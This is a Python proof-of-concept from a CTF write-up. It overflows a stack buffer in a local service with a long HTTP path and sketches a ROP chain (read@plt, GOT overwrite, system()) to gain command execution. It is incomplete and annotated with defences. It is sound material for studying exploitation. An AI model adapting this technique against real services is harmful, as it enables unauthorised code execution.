
#!/usr/bin/python

import os, sys, socket

import struct

import requests

# Proof-of-concept from a CTF writeup: builds an over-long request path for the
# service on localhost:9999 so that the stack slots the author labels RBX/RBP are
# overwritten. The hard-coded 0x40xxxx addresses suggest the target binary is
# loaded at a fixed base (non-PIE) — not confirmed here — while the libc side is
# noted as randomised. From the defending side, bounds-checked copies into the
# request buffer, stack canaries and PIE are what make these offsets and
# addresses stop being stable.
#cmd = sys.argv[1]+"\0"

# Command string whose byte length is packed into the read() chain below; the
# argv variant above is commented out, so this listing always uses the fixed 'ls'.
cmd = 'ls'

#payload for Option 1: GET request, needs some filler or err - 'A' * 4 to be taken off buffer

# Request path used as the overflow input. The whole string is later passed to
# requests.get(), so it doubles as the URL.
# NOTE(review): the opening quote is a typographic apostrophe (’) as rendered on the
# page — presumably a transcription artefact of a plain r'...' literal.
payload = r’http://localhost:9999/\AAAA'

#Payload for Option 2: CURL

#payload = ''

#filler - fill buffer with A’s , thought this would be 536 - 4, but turns out to be 535

# 531 filler bytes (535 - 4); the author's note above records that the offset was
# found empirically rather than derived.
payload += 'A' * (535 - 4)

#overwrite RBX

# 8 bytes landing in what the author identifies as the saved-RBX slot.
payload += 'B' * 8

#overwrite RBP

# 8 bytes landing in what the author identifies as the saved-RBP slot.
payload += 'C' * 8

#write stdin to .dynamic using read@plt (0000000000400cf0 <read@plt>:)

# Call chain for a read() into .dynamic, as described by the author. Each entry is
# packed with "<I", i.e. as a 4-byte little-endian unsigned value.
# NOTE: `someother` is assembled here but nothing in the visible listing appends it
# to `payload`; the 'D' filler below follows the RBP bytes directly.
someother = struct.pack("<I", 0x000400cf0) #read() call loc

someother += struct.pack("<I", 0x000401787) #PPPR

someother += struct.pack("<I", 0) #stdin

someother += struct.pack("<I", 0x000602e28) #.dynamic addr

someother += struct.pack("<I", len(cmd)) #len of cmd

#leak address of read() in randomised libc

#call read@plt to overwrite the ptr stored in GOT

#call read@plt with address of system() in libc

# (The three steps above are plan notes only; no code for them appears in this listing.)

#padding - continue filler, writing into RSP

# 150 trailing bytes appended straight after the RBP bytes.
payload += 'D' * 150

#Payload delivery Option1: requests.get

# Option 1 delivery: `payload` is used as the complete URL (it starts with the
# http://localhost:9999/ prefix built above).
r = requests.get(payload)

# HTTP status returned by the service; the author prints it as the only result check.
print(r.status_code)

# Total length of the request string, for comparison with the offsets noted above.
print(len(payload))

#Payload delivery Option2: system cmd curl

#print("Sending payload of total length {}".format(len(payload))) #system("/usr/bin/curl -g localhost:9999/\"" +payload + "\"")
